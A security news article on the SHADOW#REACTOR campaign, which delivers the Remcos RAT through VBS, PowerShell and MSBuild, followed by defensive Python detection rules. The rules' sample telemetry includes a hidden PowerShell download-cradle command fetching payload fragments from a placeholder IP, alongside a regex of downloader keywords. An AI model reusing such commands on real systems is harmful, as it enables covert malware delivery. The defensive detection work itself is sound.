Security researchers at Securonix have detailed a new multi-stage Windows malware campaign, tracked as SHADOW#REACTOR, that uses layered obfuscation and legitimate system tools to deliver the Remcos remote access trojan while evading detection.
According to the analysis, the campaign follows a carefully structured infection chain designed to minimise on-disk artefacts and blend in with normal system activity. The attack begins with an obfuscated Visual Basic Script (VBS) launcher executed via wscript.exe. This initial stage invokes a PowerShell-based downloader, which retrieves multiple fragmented, text-based payloads from a remote server.
Rather than delivering a single executable, the attackers split the malware into smaller components that are reconstructed locally. These fragments are reassembled into encoded loaders, which are then decoded entirely in memory by a .NET assembly protected using Reactor-style obfuscation. This approach helps the malware avoid traditional file-based detection mechanisms.
Once decoded, the loader retrieves a remote configuration for Remcos, a widely used remote access trojan. In the final stage of the infection chain, the malware abuses MSBuild.exe—a legitimate Microsoft build utility—as a living-off-the-land binary (LOLBin) to execute the payload. At this point, the Remcos backdoor is fully deployed, giving the attacker persistent control over the compromised system.
Securonix said the campaign appears to follow a broad and opportunistic targeting model, with activity observed primarily in general enterprise and small-to-medium business environments. There was no indication of sector-specific targeting or geopolitical alignment.
The tooling, delivery method and use of Remcos are consistent with financially motivated threat actors rather than advanced state-sponsored groups. Researchers assessed SHADOW#REACTOR as an unattributed loader framework designed to distribute Remcos at scale while reducing the likelihood of detection through in-memory execution, payload fragmentation and the abuse of trusted Windows utilities.
The findings highlight how commodity malware campaigns continue to adopt increasingly sophisticated techniques traditionally associated with higher-tier threats. By chaining together scripting languages, legitimate binaries and memory-only execution, attackers are able to bypass many conventional security controls, particularly in environments that rely heavily on signature-based detection.
Securonix said the campaign underscores the need for behavioural monitoring, visibility into script and LOLBin activity, and stronger controls around PowerShell and Windows scripting engines, especially in SMB and enterprise environments where such attacks remain common. In practice that means collecting process-creation telemetry with parent-process and command-line fields, so that a sequence such as wscript.exe spawning powershell.exe, which in turn spawns MSBuild.exe, can be flagged as a chain even though none of the three binaries is malicious on its own.
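The following detection logic is an added example written for this article; it is not Securonix's code and not a published detection rule. It takes the infection chain described above (wscript.exe launching PowerShell, PowerShell fetching several text fragments, and MSBuild.exe being run as the final LOLBin) and turns it into process-ancestry rules that run over Sysmon Event ID 1 / Security 4688 style process-creation records. The sample events, IP address, file names and the list of suspicious PowerShell tokens are all constructed for illustration; the inclusion of cscript.exe and pwsh.exe as equivalents of wscript.exe and powershell.exe is an assumption that generalises slightly beyond what the report states. It also includes benign developer and admin events to show that the chain rules do not fire on an ordinary MSBuild or PowerShell run.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

# Process names from the reported chain, plus equivalents added here as an assumption.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
BUILD_LOLBINS = {"msbuild.exe"}

# A build tool loading a project file from a user-writable location is unusual.
USER_WRITABLE = re.compile(r"\\(appdata|temp|users\\public|programdata|downloads)\\", re.I)
# Illustrative launcher/downloader tokens (assumption, not the report's indicators).
PS_SUSPICIOUS = re.compile(
    r"(-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|"
    r"downloadstring|net\.webclient|invoke-webrequest|\biwr\b|invoke-restmethod)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.I)


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: pid, parent pid, image path, command line."""
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    chain: str  # ancestry rendered root-first, e.g. "explorer.exe > wscript.exe > ..."


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, ProcEvent], pid: int) -> List[str]:
    """Walk ppid links upward and return image basenames root-first (cycle-safe)."""
    chain, seen = [], set()
    cur: Optional[ProcEvent] = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return list(reversed(chain))


def detect(events: List[ProcEvent]) -> List[Finding]:
    """Apply per-event and whole-ancestry rules; returns one Finding per rule hit."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for e in events:
        child = basename(e.image)
        parent_ev = by_pid.get(e.ppid)
        parent = basename(parent_ev.image) if parent_ev else ""
        chain = ancestry(by_pid, e.pid)
        rules = []
        if parent in SCRIPT_HOSTS and child in SHELLS:
            rules.append("script_host_spawns_powershell")
        if child in SHELLS and PS_SUSPICIOUS.search(e.cmdline) \
                and len(set(URL_RE.findall(e.cmdline))) >= 2:
            # Several distinct URLs in one launcher: fragmented payload retrieval.
            rules.append("powershell_multi_fragment_download")
        if parent in SHELLS and child in BUILD_LOLBINS:
            rules.append("powershell_spawns_msbuild")
        if child in BUILD_LOLBINS and USER_WRITABLE.search(e.cmdline):
            rules.append("msbuild_project_in_user_writable_path")
        if child in BUILD_LOLBINS and (set(chain) & SCRIPT_HOSTS) and (set(chain) & SHELLS):
            # The full script host -> PowerShell -> MSBuild ancestry, any depth.
            rules.append("script_to_powershell_to_msbuild_chain")
        findings.extend(Finding(e.pid, r, " > ".join(chain)) for r in rules)
    return findings


def rules_by_pid(findings: List[Finding]) -> Dict[int, Set[str]]:
    out: Dict[int, Set[str]] = {}
    for f in findings:
        out.setdefault(f.pid, set()).add(f.rule)
    return out


# Constructed sample telemetry; pids 400-1004 mimic the reported chain, the rest is benign.
SAMPLE_EVENTS = [
    ProcEvent(400, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(812, 400, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\alice\AppData\Local\Temp\Invoice_2931.vbs"'),
    ProcEvent(902, 812, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -w hidden -c \"$w=New-Object Net.WebClient;"
              "$a=$w.DownloadString('http://203.0.113.10/p1.txt');"
              "$b=$w.DownloadString('http://203.0.113.10/p2.txt')\""),
    ProcEvent(1004, 902, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\Users\alice\AppData\Roaming\stage.xml"),
    ProcEvent(2000, 400, r"C:\Program Files\Microsoft Visual Studio\devenv.exe", "devenv.exe"),
    ProcEvent(2100, 2000, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
              r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
    ProcEvent(2200, 400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
]

if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} chain={f.chain}")
```

The ancestry rule is the one worth keeping even if the others prove noisy in a given estate: a developer's MSBuild run has devenv.exe or a build agent above it, never a script host, so the chain check separates the two cases without relying on the project file's location or on any string in the PowerShell command line, both of which an attacker controls.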